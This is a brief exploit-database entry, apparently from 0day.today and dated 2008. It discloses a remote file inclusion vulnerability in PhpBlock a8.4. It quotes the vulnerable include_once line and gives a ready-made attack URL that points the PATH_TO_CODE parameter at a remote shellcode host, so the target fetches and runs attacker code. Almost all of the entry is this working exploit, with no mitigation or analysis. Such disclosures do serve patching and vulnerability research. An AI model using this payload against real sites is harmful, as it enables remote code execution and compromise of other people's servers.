id: 2802
date: 04/01/2008
title: PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability
author: w0cker
cves: 

================================================================
PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability
================================================================



Script Name : PHP Block a8.4
 
Error : include_once $PATH_TO_CODE."/script/fonction.php";
 
Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=http://[ShellCode]



#  0day.today [2023-03-26]  #